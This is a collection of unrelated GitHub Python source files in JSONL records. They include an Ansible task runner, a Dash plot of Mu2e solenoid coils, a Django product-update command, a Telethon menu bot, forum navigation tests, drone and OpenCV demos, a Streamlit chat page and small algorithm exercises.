+{"seq_id":"73463574160","text":"# coding=utf-8\r\n# @Time : 2019/7/2 17:13\r\n# @Author : zwa\r\n# coding:utf-8\r\n\r\nimport json\r\nfrom collections import namedtuple\r\nfrom ansible.parsing.dataloader import DataLoader\r\nfrom ansible.vars.manager import VariableManager\r\nfrom ansible.inventory.manager import InventoryManager\r\nfrom ansible.playbook.play import Play\r\nfrom ansible.executor.task_queue_manager import TaskQueueManager\r\nfrom ansible.plugins.callback import CallbackBase\r\n\r\n\r\nclass ResultsCollector(CallbackBase):\r\n \"\"\"重构执行结果\"\"\"\r\n def __init__(self, *args, **kwargs):\r\n super(ResultsCollector, self).__init__(*args, **kwargs)\r\n self.host_ok = {}\r\n self.host_unreachable = {}\r\n self.host_failed = {}\r\n\r\n def v2_runner_on_unreachable(self, result, *args, **kwargs):\r\n \"\"\"不可达\"\"\"\r\n self.host_unreachable[result._host.get_name()] = result\r\n\r\n def v2_runner_on_ok(self, result, *args, **kwargs):\r\n \"\"\"执行成功\"\"\"\r\n self.host_ok[result._host.get_name()] = result\r\n\r\n def v2_runner_on_failed(self, result, *args, **kwargs):\r\n \"\"\"执行失败\"\"\"\r\n self.host_failed[result._host.get_name()] = result\r\n\r\n\r\ndef run_ansible(module_name,module_args,host_list,option_dict):\r\n # 初始化需要的对象\r\n Options = namedtuple('Options',\r\n ['connection', 'module_path', 'forks', 'become',\r\n 'become_method', 'private_key_file','become_user',\r\n 'remote_user', 'check', 'diff']\r\n )\r\n #负责查找和读取yaml、json和ini文件\r\n loader = DataLoader()\r\n\r\n options = Options(connection='ssh', module_path=None, forks=5, become=option_dict['become'],\r\n become_method='sudo',private_key_file=\"/root/.ssh/id_rsa\",\r\n become_user='root', remote_user=option_dict['remote_user'], check=False, diff=False\r\n )\r\n\r\n passwords = dict(vault_pass='secret')\r\n\r\n # 实例化ResultCallback来处理结果\r\n callback = ResultsCollector()\r\n\r\n # 创建库存(inventory)并传递给VariableManager\r\n inventory = InventoryManager(loader=loader, sources=['/etc/ansible/hosts'])\r\n variable_manager = VariableManager(loader=loader, inventory=inventory)\r\n\r\n # 创建任务\r\n host = \",\".join(host_list)\r\n play_source = dict(\r\n name=\"Ansible Play\",\r\n hosts=host,\r\n gather_facts='no',\r\n tasks=[\r\n dict(action=dict(module=module_name, args=module_args), register='shell_out'),\r\n ]\r\n )\r\n play = Play().load(play_source, variable_manager=variable_manager, loader=loader)\r\n\r\n # 开始执行\r\n tqm = None\r\n\r\n tqm = TaskQueueManager(\r\n inventory=inventory,\r\n variable_manager=variable_manager,\r\n loader=loader,\r\n options=options,\r\n passwords=passwords,\r\n stdout_callback=callback,\r\n )\r\n result = tqm.run(play)\r\n\r\n result_raw = {'success': {}, 'failed': {}, 'unreachable': {}}\r\n\r\n for host, result in callback.host_ok.items():\r\n result_raw['success'][host] = result._result['stdout_lines']\r\n\r\n for host, result in callback.host_failed.items():\r\n result_raw['failed'][host] = result._result['stderr_lines']\r\n\r\n for host, result in callback.host_unreachable.items():\r\n result_raw['unreachable'][host] = result._result[\"msg\"]\r\n\r\n return json.dumps(result_raw, indent=4)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n option_dict={\"become\":True,\"remote_user\":\"root\"}\r\n module_name = 'shell'\r\n module_args = \"ls /root\"\r\n host_list = ['192.168.3.16']\r\n ret = run_ansible(module_name,module_args,host_list,option_dict)\r\n print(ret)\r\n print(eval(ret))\r\n print(ret)\r\n 
\r\n","repo_name":"airring/k8s_install","sub_path":"script/Ansible_task.py","file_name":"Ansible_task.py","file_ext":"py","file_size_in_byte":3749,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"3"}
+{"seq_id":"31096962946","text":"import pandas as pd\nimport numpy as np\nimport plotly.graph_objects as go\nimport matplotlib.pyplot as plt\nfrom matplotlib.pyplot import cm\nfrom Plot_update import *\n\nimport dash\nfrom dash import Dash\nfrom dash.dependencies import Input, Output\nimport dash_core_components as dcc\nimport dash_html_components as html\n\n\n#geom_df_mu2e = pd.read_pickle('/home/shared_data/helicalc_params/Mu2e_Coils_Conductors.pkl')\n\ndf_bars = pd.read_csv(datadir + \"Mu2e_Longitudinal_Bars_V13.csv\")\ndff = df_bars.assign(ending_z = df_bars['z0'] + df_bars['length'])\n\n\n\n\napp = dash.Dash(__name__)\n\n\napp.layout = html.Div([\nhtml.Div(children=[html.Div([\n html.H1(children = 'Current Continuity')])]),\nhtml.Div(\n [\n html.Div(\n [\n html.H6(\"\"\"Select Solenoid\"\"\",\n style={'margin-right': '2em'})\n ],\n\n ),\n dcc.Dropdown(\n id='solenoid-dropdown',\n options=[\n {'label': 'Production Solenoid (PS)', 'value': 'PS'},\n {'label': 'Transport Solenoid (TS)', 'value': 'TS'},\n {'label': 'Detector Solenoid (DS)', 'value': 'DS'},\n ], value = 'DS',\n\n )\n ],\n #style=dict(display='flex')\n ),\n\nhtml.Div(\n [\n html.I(\"Input starting and ending Z to plot [must be within 3.74888 and 13.64073] \"),\n html.Br(),\n dcc.Input(id=\"input1\", type=\"number\", placeholder=\"\", style={'marginRight':'10px'}, value = 3.74888 ),\n dcc.Input(id=\"input2\", type=\"number\", placeholder=\"\", value = 13.64073, debounce=True),\n html.Div(id=\"output\"),\n ]\n),\n\n\n\n html.Div([\n html.Div([\n html.H3('Plot of Entire Selected Solenoid'),\n dcc.Graph(id=\"Coil1\")\n #style={'width': '90vh', 'height': '90vh'})\n ],className=\"six columns\"),\n html.Div([\n html.H3('Plot of Coils and Longitudinal Bars within Z Range'),\n dcc.Graph(id=\"Coil2\", style={'width': '90vh', 'height': '90vh'})\n ], className=\"six columns\"), ], className=\"row\" ),\n\n\n\n])\n\ncamera = dict(\n up = dict(x=0, y=1, z=0),\n center = dict(x=0, y=0, z=0),\n eye = dict(x=-2, y=1.25, z=-1.25)\n)\n\n\n@app.callback(\n Output('Coil1', 'figure'),\n Input('solenoid-dropdown', 'value'))\n\ndef update_output(input_solenoid):\n df_raw = load_data(\"Mu2e_Coils_Conductors.pkl\")\n\n solenoid = input_solenoid\n\n in_solenoid = df_raw.loc[df_raw['Solenoid'] == solenoid]\n\n num_first = in_solenoid[\"Coil_Num\"].iloc[0]\n num_last = in_solenoid[\"Coil_Num\"].iloc[-1]\n\n cyl = go.Figure()\n\n\n for num in range(num_first, num_last):\n x, y, z = get_thick_cylinder_surface_xyz(df_raw, num)\n\n cyl.add_traces(data=go.Surface(x=x, y=y, z=z,\n surfacecolor = np.ones_like(x),\n colorscale = [[0, 'red'], [1, 'red']],\n showscale=False,\n showlegend=False,\n name='Coils (radial center)',\n ))\n\n cyl.update_layout(title=f'{solenoid} Coils',\n scene = dict(aspectmode = 'data', camera = camera),\n autosize = False, width = 1600, height = 800\n )\n return cyl\n\n@app.callback(\n Output('Coil2', 'figure'),\n [Input('input1', 'value'), Input('input2', 'value')])\n\ndef update_coils(start_z_selected, end_z_selected):\n df_raw = load_data(\"Mu2e_Coils_Conductors.pkl\")\n\n coils = df_raw.query(f'z < {end_z_selected} and z >= {start_z_selected}')\n bars = dff.query(f'z0 < {end_z_selected} and z0 >= {start_z_selected}')\n num_first = coils[\"Coil_Num\"].iloc[0]\n num_last = coils[\"Coil_Num\"].iloc[-1]\n\n cyl2 = go.Figure()\n index = bars.index\n idx = index.tolist()\n\n for num in range(num_first, num_last):\n x, y, z = get_thick_cylinder_surface_xyz(df_raw, num)\n\n cyl2.add_traces(data=go.Surface(x=x, y=y, z=z,\n 
surfacecolor=np.ones_like(x),\n colorscale=[[0, 'red'], [1, 'red']],\n showscale=False,\n showlegend=False,\n name='Coils (radial center)',\n ))\n for i in idx:\n z_start = df_bars['z0'].iloc[i]\n z_end = df_bars['z0'].iloc[i] + df_bars['length'].iloc[i]\n z_values = np.arange(z_start, z_end)\n\n num = len(z_values)\n x_values = [df_bars['x0'].iloc[i]] * num\n y_values = [df_bars['y0'].iloc[i]] * num\n\n cyl2.add_traces(data=go.Scatter3d(\n x=x_values, y=y_values, z=z_values,\n marker=dict(\n size=4,\n color='red',\n # colorscale='Viridis',\n ),\n line=dict(\n color='darkblue',\n width=2\n )\n ))\n cyl2.update_layout(title= f'DS Coils and Longitudinal Bars from Z range {start_z_selected} to {end_z_selected}',\n scene=dict(aspectmode='data', camera=camera),\n autosize=False, width=1600, height=800\n )\n return cyl2\n\n\n\n\n\n\napp.run_server(debug=True)\n\n\n\n","repo_name":"Lszemraj/Current-Continuity","sub_path":"2.py","file_name":"2.py","file_ext":"py","file_size_in_byte":5401,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
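The record above wires everything through Dash callbacks. A minimal, self-contained sketch of that Input/Output pattern (using the current `from dash import dcc, html` imports rather than the deprecated `dash_core_components` module imported above):

```python
import dash
from dash import dcc, html
from dash.dependencies import Input, Output

app = dash.Dash(__name__)
app.layout = html.Div([
    dcc.Input(id="z-start", type="number", value=3.74888),
    html.Div(id="echo"),
])

@app.callback(Output("echo", "children"), Input("z-start", "value"))
def echo(value):
    # Re-runs whenever the input's "value" property changes.
    return f"Selected z: {value}"

if __name__ == "__main__":
    app.run_server(debug=True)
```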
+{"seq_id":"18442718654","text":"from datetime import datetime\nfrom typing import Any, Optional\nfrom datetime import datetime\nfrom random import randint\nfrom django.core.management.base import BaseCommand\nfrom app.models import Product\nfrom app.redis_service import set_redis_value\n\nclass Command(BaseCommand):\n help = '''set an arbitrary valid value of the price, \n balance, status fields for the Product model'''\n\n def add_arguments(self, parser):\n pass \n \n def handle(self, *args: Any, **options: Any) -> Optional[str]:\n \n min = 0\n max = 10000\n all_products = Product.objects.all()\n choices = self.get_product_choices()\n\n for product in all_products:\n \n stock_value = randint(0,len(choices)-1)\n \n product.price = randint(min, max)\n product.remains = randint(min, max) \n product.status = choices[stock_value]\n \n _ = Product.objects.bulk_update(\n all_products, ['price','remains','status'], batch_size=999)\n \n set_redis_value('products_updated_at', str(datetime.now()))\n\n return self.stdout.write(self.style.SUCCESS('OK'))\n \n def get_product_choices(self) ->tuple():\n '''returns a tuple of the values \n of the field model status Product'''\n \n choices = Product._meta.get_field('status').choices\n in_stok = choices[0][0]\n out_of_stok = choices[1][0]\n \n return (in_stok,out_of_stok)\n","repo_name":"ogs13/django-products-dock","sub_path":"core/app/management/commands/set_product_values.py","file_name":"set_product_values.py","file_ext":"py","file_size_in_byte":1509,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"8472887248","text":"class Solution:\n def subsets(self, nums: List[int]) -> List[List[int]]:\n ans = list()\n ans.append([])\n if not nums:\n return ans\n\n for num in nums:\n ans.extend(\n [curr + [num] for curr in ans]\n )\n \n return ans","repo_name":"robertomaldonado/LeetHubCode","sub_path":"78-subsets/78-subsets.py","file_name":"78-subsets.py","file_ext":"py","file_size_in_byte":301,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"32904182863","text":"import asyncio\nimport os\nfrom gettext import gettext as _\nfrom telethon import TelegramClient\nfrom telethon.events import NewMessage, CallbackQuery, StopPropagation\nfrom telethon.tl.custom import Message\n\nfrom config import API_ID, API_HASH, BOT_TOKEN\nfrom utils import load_buttons, load_more_buttons, dynamic_import, handle_back, get_current_func, import_file, \\\n reset_current_func\n\nasyncio.set_event_loop(asyncio.new_event_loop())\nclient = TelegramClient(\"bot\", API_ID, API_HASH).start(\n bot_token=BOT_TOKEN\n)\n\n\n@client.on(NewMessage(incoming=True, pattern='^/start$'))\nasync def start(event: NewMessage.Event):\n \"\"\"\n This function is called when the user sends /start\n We want to show the user a list of buttons of the main modules\n :return:\n \"\"\"\n modules, description = dynamic_import(os.path.join(os.path.dirname(__file__), 'modules'))\n\n await event.reply(description, buttons=load_buttons(modules, add_back=False))\n\n raise StopPropagation\n\n\n@client.on(CallbackQuery)\nasync def handle_callback(event: CallbackQuery.Event):\n \"\"\"\n This function is called when the user clicks on a button\n :return:\n \"\"\"\n original_data = event.data.decode('utf-8')\n # we want to know if the clicked button is nested or not\n data = original_data.split('_')\n # the name of the module is the last element\n func_name = data[-1]\n # everything else is the location of the module\n path = data[:-1]\n # if the model is \"back\" then we're going up one level\n if func_name == \"back\":\n await event.answer(\"going back!\")\n await handle_back(event, original_data)\n return\n # we want to get the full location of the module so we can load it.\n path_location = os.path.join(os.path.dirname(__file__), 'modules', *path)\n # we dynamically load all the modules\n modules, description = dynamic_import(path_location)\n # we get the specific module that the user clicked on\n module = modules[func_name]\n # since the user clicked on this we will call the callback_func of said module.\n # If the module has no callback_func that means it has nesetd modules and we want to load more buttons\n function = module.get(\"callback_func\", load_more_buttons)\n await event.answer(_(\"Working on your request..\"))\n try:\n # you can never be sure with theses\n await function(event, original_data)\n except Exception as e:\n import traceback\n traceback.print_exc()\n await event.answer(_(\"An error has happened while processing your request\"))\n\n\n@client.on(NewMessage(incoming=True))\nasync def handle_messages(event: Message):\n \"\"\"\n This function is called when the user sends a message.\n It's purpose is to figure out what module function to call\n :param event:\n :return:\n \"\"\"\n # if the user sends cancel at any point we just resets to the start\n if event.text == \"/cancel\":\n await event.reply(_(\"Canceled\"))\n reset_current_func()\n return\n # this will return the stored function of the module that the user clicked on previously\n func = get_current_func()\n # if the user has clicked on nothing then we just tell them to do so\n if func is not None:\n # we load the module's message function to call\n func = import_file(\"func\", func).message_func\n try:\n await func(event)\n except Exception as e:\n import traceback\n traceback.print_exc()\n await event.reply(_(\"An error has happened while processing your request\"))\n # This might get spammy because we're telling the user that they can cancel after each message.\n await event.respond(_(\"Use /cancel 
to cancel the current request\"))\n else:\n await event.respond(_(\"Please click on /start to get a menu\"))\n\n\nprint(\"Running!\")\nclient.run_until_disconnected()\n","repo_name":"painor/modular_menu_bot","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3855,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
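The callback router above treats the button payload as an underscore-delimited path whose last segment is the handler name. That split is easy to test in isolation:

```python
def route(data: str):
    parts = data.split("_")
    return parts[:-1], parts[-1]  # (module path, handler name)

assert route("tools_convert_back") == (["tools", "convert"], "back")
assert route("start") == ([], "start")
```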
+{"seq_id":"73430876560","text":"\nfrom pathlib import Path\n\nfrom datetime import datetime\nfrom pathlib import Path\nclass A:\n #writing to log file\n def write_to_log_file(self,path1,path2):\n message1=\"this is first msg \\n\"\n message2=\"this is sec msg \"\n file1= open(path1,'w')\n file1_content=file1.write(message1)\n file2=open(path2,'w')\n file2_content=file2.write(message2)\n file1.close()\n file2.close()\n f1=open(path1,'r')\n f2=open(path2,'r')\n print(f1.read())\n f1.close()\n f2.close()\n first=open(path1,'a+')\n second=open(path2,'r')\n first.write(second.read())\n first.seek(0)\n second.seek(0)\n # f1=open(file1,'a+')\n # f2=open(file2,'r')\n # f1.write(f2.read())\npath1='C:/Users/vgunaganti/PycharmProjects/HelloWorld/file1.txt'\npath2='C:/Users/vgunaganti/PycharmProjects/HelloWorld/file2.txt'\nobj=A()\nobj.write_to_log_file(path1,path2)","repo_name":"venkannagunaganti/HelloWorld","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":950,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"5263585511","text":"from django.conf import settings\n\nfrom misago.acl import add_acl\nfrom misago.forums.models import Forum\nfrom misago.readtracker import threadstracker\nfrom misago.users.testutils import AuthenticatedUserTestCase\n\nfrom misago.threads import goto\nfrom misago.threads.permissions import exclude_invisible_posts\nfrom misago.threads.testutils import post_thread, reply_thread\n\n\nPOSTS_PER_PAGE = settings.MISAGO_POSTS_PER_PAGE\nTHREAD_TAIL = settings.MISAGO_THREAD_TAIL\nMAX_PAGE_LEN = POSTS_PER_PAGE + THREAD_TAIL\n\n\nclass MockThreadsCounter(object):\n def set(self, *args, **kwargs):\n pass\n\n def decrease(self, *args, **kwargs):\n pass\n\n\nclass GotoTests(AuthenticatedUserTestCase):\n def setUp(self):\n super(GotoTests, self).setUp()\n\n self.forum = Forum.objects.all_forums().filter(role=\"forum\")[:1][0]\n self.forum.labels = []\n\n self.thread = post_thread(self.forum)\n add_acl(self.user, self.forum)\n add_acl(self.user, self.thread)\n\n def test_get_thread_pages(self):\n \"\"\"get_thread_pages returns valid count of pages for given positions\"\"\"\n self.assertEqual(goto.get_thread_pages(1), 1)\n self.assertEqual(goto.get_thread_pages(POSTS_PER_PAGE), 1)\n self.assertEqual(goto.get_thread_pages(MAX_PAGE_LEN), 1)\n self.assertEqual(goto.get_thread_pages(MAX_PAGE_LEN + 1), 2)\n self.assertEqual(goto.get_thread_pages(POSTS_PER_PAGE * 2 - 1), 2)\n self.assertEqual(goto.get_thread_pages(POSTS_PER_PAGE * 2), 2)\n\n self.assertEqual(goto.get_thread_pages(POSTS_PER_PAGE * 3), 3)\n self.assertEqual(goto.get_thread_pages(\n POSTS_PER_PAGE * 5 + THREAD_TAIL - 1), 5)\n\n def test_get_post_page(self):\n \"\"\"get_post_page returns valid page number for given queryset\"\"\"\n self.assertEqual(goto.get_post_page(1, self.thread.post_set), 1)\n\n # fill out page\n [reply_thread(self.thread) for p in xrange(MAX_PAGE_LEN - 1)]\n self.assertEqual(\n goto.get_post_page(MAX_PAGE_LEN, self.thread.post_set), 1)\n\n # add 2 posts, adding second page\n [reply_thread(self.thread) for p in xrange(2)]\n self.assertEqual(\n goto.get_post_page(MAX_PAGE_LEN + 2, self.thread.post_set), 2)\n\n def test_hashed_reverse(self):\n \"\"\"hashed_reverse returns complete url for given post\"\"\"\n url = goto.hashed_reverse(self.thread, self.thread.first_post)\n url_formats = self.thread.get_absolute_url(), self.thread.first_post_id\n self.assertEqual(url, '%s#post-%s' % url_formats)\n\n url = goto.hashed_reverse(self.thread, self.thread.first_post, 4)\n url_formats = self.thread.get_absolute_url(), self.thread.first_post_id\n self.assertEqual(url, '%s4/#post-%s' % url_formats)\n\n def test_last(self):\n \"\"\"last returns link to last post in thread\"\"\"\n url_last = goto.last(self.thread, self.thread.post_set)\n url_formats = self.thread.get_absolute_url(), self.thread.last_post_id\n self.assertEqual(url_last, '%s#post-%s' % url_formats)\n\n # add posts to reach page limit\n [reply_thread(self.thread) for p in xrange(MAX_PAGE_LEN - 1)]\n\n url_last = goto.last(self.thread, self.thread.post_set)\n url_formats = self.thread.get_absolute_url(), self.thread.last_post_id\n self.assertEqual(url_last, '%s#post-%s' % url_formats)\n\n # add 2 posts to add second page to thread\n [reply_thread(self.thread) for p in xrange(2)]\n\n url_last = goto.last(self.thread, self.thread.post_set)\n url_formats = self.thread.get_absolute_url(), self.thread.last_post_id\n self.assertEqual(url_last, '%s2/#post-%s' % url_formats)\n\n def test_get_post_link(self):\n \"\"\"get_post_link returns link to specified 
post\"\"\"\n post_link = goto.get_post_link(\n 1, self.thread.post_set, self.thread, self.thread.last_post)\n last_link = goto.last(self.thread, self.thread.post_set)\n self.assertEqual(post_link, last_link)\n\n # add posts to add extra page to thread\n [reply_thread(self.thread) for p in xrange(MAX_PAGE_LEN)]\n\n post_link = goto.get_post_link(\n MAX_PAGE_LEN + 1,\n self.thread.post_set, self.thread, self.thread.last_post)\n last_link = goto.last(self.thread, self.thread.post_set)\n self.assertEqual(post_link, last_link)\n\n def test_new(self):\n \"\"\"new returns link to first unread post\"\"\"\n self.user.new_threads = MockThreadsCounter()\n self.user.unread_threads = MockThreadsCounter()\n\n post_link = goto.new(self.user, self.thread, self.thread.post_set)\n last_link = goto.last(self.thread, self.thread.post_set)\n self.assertEqual(post_link, last_link)\n\n # add extra page to thread, then read them\n [reply_thread(self.thread) for p in xrange(MAX_PAGE_LEN)]\n threadstracker.read_thread(\n self.user, self.thread, self.thread.last_post)\n\n # add extra unread posts\n first_unread = reply_thread(self.thread)\n [reply_thread(self.thread) for p in xrange(20)]\n\n new_link = goto.new(self.user, self.thread, self.thread.post_set)\n post_link = goto.get_post_link(\n MAX_PAGE_LEN + 21, self.thread.post_set, self.thread, first_unread)\n self.assertEqual(new_link, post_link)\n\n # read thread\n threadstracker.read_thread(\n self.user, self.thread, self.thread.last_post)\n\n # assert new() points to last reply\n post_link = goto.new(self.user, self.thread, self.thread.post_set)\n last_link = goto.last(self.thread, self.thread.post_set)\n self.assertEqual(post_link, last_link)\n\n def test_post(self):\n \"\"\"post returns link to post given\"\"\"\n thread = self.thread\n\n post_link = goto.post(thread, thread.post_set, thread.last_post)\n last_link = goto.last(self.thread, self.thread.post_set)\n self.assertEqual(post_link, last_link)\n\n # add 24 posts\n [reply_thread(self.thread) for p in xrange(24)]\n\n post_link = goto.post(thread, thread.post_set, thread.last_post)\n last_link = goto.last(self.thread, self.thread.post_set)\n self.assertEqual(post_link, last_link)\n","repo_name":"xuzhao1211/OnlineExam","sub_path":"misago/threads/tests/test_goto.py","file_name":"test_goto.py","file_ext":"py","file_size_in_byte":6254,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"15476646643","text":"#https://www.acmicpc.net/problem/14503\n#로봇 청소기\n#BFS로 풀이\n\nimport sys\nfrom collections import deque\ninput = sys.stdin.readline\n\nn,m = map(int, input().split()) #크기\nr,c,d = map(int, input().split()) #청소기좌표, 방향\ngraph = [] #정보\n\ndx = [-1, 0, 1, 0] #북동남서\ndy = [0, 1, 0, -1]\n\nfor i in range(n): #입력\n graph.append(list(map(int, input().split())))\n\ndef bfs(x, y, d):\n q = deque([[x, y, d]])\n cnt = 1\n while q:\n x, y, d = q.popleft()\n graph[x][y] = 2\n nd = d\n for i in range(4):\n nd = (nd-1) % 4 #방향\n nx = x + dx[nd]\n ny = y + dy[nd]\n if 0 <= nx < n and 0 <= ny < m and graph[nx][ny]==0:\n cnt += 1\n graph[nx][ny] == 2\n q.append([nx, ny, nd])\n break\n elif i == 3:\n back = (d - 2) % 4\n nx = x + dx[back]\n ny = y + dy[back]\n\n if graph[nx][ny] == 1:\n return cnt\n else:\n q.append([nx, ny, d])\n\nprint(bfs(r,c,d))\n","repo_name":"cwaa079/BaekJoon-Algorithm","sub_path":"삼성 SW 역량 테스트 기출 문제/14503.py","file_name":"14503.py","file_ext":"py","file_size_in_byte":1118,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"10101803372","text":"from array import array\nimport cv2\nimport numpy as np\n\nx1:int=0\nx2:int=0\ny1:int=0\ny2:int=0\ndrawing=False\ncrop=False\n\ndef draw(event,x,y,flags,param):\n global crop,drawing,arr,x1,x2,y1,y2\n if event==cv2.EVENT_LBUTTONDOWN:\n drawing=True\n crop=True\n \n x1,y1=x,y\n elif event==cv2.EVENT_MOUSEMOVE:\n if drawing==True:\n if crop==True:\n \n cv2.rectangle(img,(x1,y1),(x,y),(0,0,255),-1) \n elif event==cv2.EVENT_LBUTTONUP:\n if crop==True:\n drawing=False\n x2,y2=x,y\n img[:]=(20,20,20)\n img[y1:y2,x1:x2]=(255,255,255) \n \nimg=np.zeros((500,500,3),np.uint8)\nimg[:]=255\ncv2.namedWindow('sadegh')\ncv2.setMouseCallback('sadegh',draw)\nwhile True:\n k=cv2.waitKey(1)\n if k==27:\n break\n cv2.imshow('sadegh',img)\ncv2.destroyAllWindows() ","repo_name":"sadeghhidden/opencv_exercises","sub_path":"foucos.py","file_name":"foucos.py","file_ext":"py","file_size_in_byte":896,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"42110909614","text":"import Tkinter\nfrom PIL import Image as PILImage, ImageTk\nimport libardrone\nimport time\nfrom MultiCamShift import *\n\n\nclass ShowImages:\n def __init__(self):\n self.drone = None\n self.main = Tkinter.Tk()\n self.picLabel = Tkinter.Label(self.main, text = \"Waiting for ARDrone image\")\n self.picLabel.grid(row = 0, column = 0)\n \n self.dataLabel = Tkinter.Label(self.main, text = \"Waiting for Navdata\")\n self.dataLabel.grid(row=1, column = 0)\n \n self.main.bind_all('', self.respondToKeyPress)\n #self.main.bind('', self.nextPicture)\n #self.main.bind('', self.resetDrone)\n #self.main.bind('', self.takeoff)\n #self.main.bind('', self.land)\n #self.main.bind('', self.moveUp)\n #self.main.bind('', self.moveDown)\n #self.main.bind('', self.turnLeft)\n #self.main.bind('', self.turnRight)\n #self.main.bind('', self.moveForward)\n #self.main.bind('', self.moveBackward)\n #self.main.bind('', self.bankLeft)\n #self.main.bind('', self.bankRight)\n self.main.bind_all('', self.keyRelease)\n self.drone = libardrone.ARDrone(True)\n \n self.mcs = MultiCamShift(self.drone, self)\n self.mcs.start()\n \n def keyRelease(self, event):\n if event.char.lower() == 'q':\n self.quit()\n else:\n self.drone.hover()\n self.nextPicture()\n print(\"Key released:\", event.keysym)\n \n def respondToKeyPress(self, event):\n respondText = 'Key press ' + event.keysym + ': '\n key = event.char.lower()\n if key == 'n':\n self.nextPicture()\n respondText += \"Taking picture\"\n elif key == 'r':\n self.drone.land()\n self.drone.reset()\n respondText += \"Resetting drone\"\n elif event.keysym == 'Return':\n self.drone.takeoff()\n respondText += \"Taking off\"\n elif key == ' ':\n self.drone.land()\n respondText += \"Landing\"\n elif event.keysym == 'Up':\n self.drone.move_up()\n respondText += \"Moving up\"\n elif event.keysym == 'Down':\n self.drone.move_down()\n respondText += \"Moving down\"\n elif event.keysym == 'Left':\n self.drone.turn_left()\n respondText += \"Turning left\"\n elif event.keysym == 'Right':\n self.drone.turn_right()\n respondText += 'Turning right'\n elif key == 'w':\n self.drone.move_forward()\n respondText += 'Moving forward'\n elif key == 's':\n self.drone.move_backward()\n respondText += 'Moving backward'\n elif key == 'a':\n self.drone.move_left()\n respondText += 'Moving left'\n elif key == 'd':\n self.drone.move_right()\n respondText += 'Moving right'\n elif key != '' and key in '1234567890':\n newSpeed = self.keyToSpeed(event.char)\n self.drone.speed = newSpeed\n respondText += 'Changing speed to ' + str(newSpeed)\n self.outputResponse(respondText)\n\n\n def keyToSpeed(self, key):\n if key == '0':\n return 1.0\n else:\n num = int(key)\n return num / 10.0\n \n def outputResponse(self, text):\n self.dataLabel['text'] = text\n print(text)\n\n \n def nextPicture(self):\n imgArray = self.drone.image\n navData = self.drone.navdata\n pilPic = PILImage.fromarray(imgArray)\n #if event != 'foo':\n #pilPic.show()\n self.currPic = ImageTk.PhotoImage(pilPic)\n self.picLabel['image'] = self.currPic\n \n #navStr = str(navData)\n #self.dataLabel['text'] = navStr\n \n \n def quit(self):\n self.drone.land()\n print(\"Quitting!\")\n time.sleep(2)\n self.mcs.stop()\n self.main.destroy()\n \n def go(self):\n self.main.mainloop()\n \n \n\ndef runDrone():\n foo = ShowImages()\n foo.go()\n 
\nrunDrone()","repo_name":"tianyoul/AI-Robotics-ComputerVision","sub_path":"libardrone/FoxDemo.py","file_name":"FoxDemo.py","file_ext":"py","file_size_in_byte":4293,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"}
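The long if/elif chain in `respondToKeyPress` above can be driven by a lookup table instead; a sketch with a stand-in for the drone object (`DummyDrone` is hypothetical, the real methods come from `libardrone.ARDrone` as used above):

```python
class DummyDrone:
    def move_up(self): print("moving up")
    def move_down(self): print("moving down")
    def turn_left(self): print("turning left")
    def turn_right(self): print("turning right")

KEY_ACTIONS = {"Up": "move_up", "Down": "move_down",
               "Left": "turn_left", "Right": "turn_right"}

def handle_key(drone, keysym):
    action = KEY_ACTIONS.get(keysym)
    if action is not None:
        getattr(drone, action)()

handle_key(DummyDrone(), "Up")  # prints "moving up"
```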
+{"seq_id":"18583451476","text":"import streamlit as st\nfrom streamlit_chat import message\nfrom PIL import Image\nfrom query.vortex_query import VortexQuery\n\n\ndef initialize_page():\n st.set_page_config(page_title='DocuVortex', page_icon=':books:')\n st.image(logo_image, width=80)\n st.header(\"NeonShield DocuVortex\")\n st.markdown(\"[Github](https://github.com/pkalkman/python-docuvortex)\")\n\n\ndef handle_query_form():\n with st.form(key='query_form'):\n user_query = st.text_input('Search for: ', '', key='input',\n help='Enter your search query?')\n submit_button = st.form_submit_button('Submit')\n return user_query, submit_button\n\n\ndef display_chat_history():\n for i, (user_msg, ai_msg) in enumerate(zip(st.session_state['past'][::-1],\n st.session_state['generated'][::-1])):\n message(user_msg, is_user=True, key=f\"user_{i}\")\n message(ai_msg, key=f\"ai_{i}\")\n\n\ndef query(question: str) -> str:\n \"\"\"\n Query the VortexQuery model with the provided question\n :param question: The question to ask the model\n :return: The answer from the model\n \"\"\"\n vortex_query = VortexQuery()\n answer, _ = vortex_query.ask_question(question)\n return answer\n\n\nlogo_image = Image.open('./logo.png')\n\n# Initialize page and session state\nst.session_state.setdefault('generated', [])\nst.session_state.setdefault('past', [])\n\ninitialize_page()\nuser_query, submit_button = handle_query_form()\n\nif submit_button and user_query:\n model_response = query(user_query)\n st.session_state.past.append(user_query)\n st.session_state.generated.append(model_response)\n\ndisplay_chat_history()\n","repo_name":"PatrickKalkman/python-docuvortex","sub_path":"app/streamlit_app.py","file_name":"streamlit_app.py","file_ext":"py","file_size_in_byte":1677,"program_lang":"python","lang":"en","doc_type":"code","stars":45,"dataset":"github-code","pt":"3"}
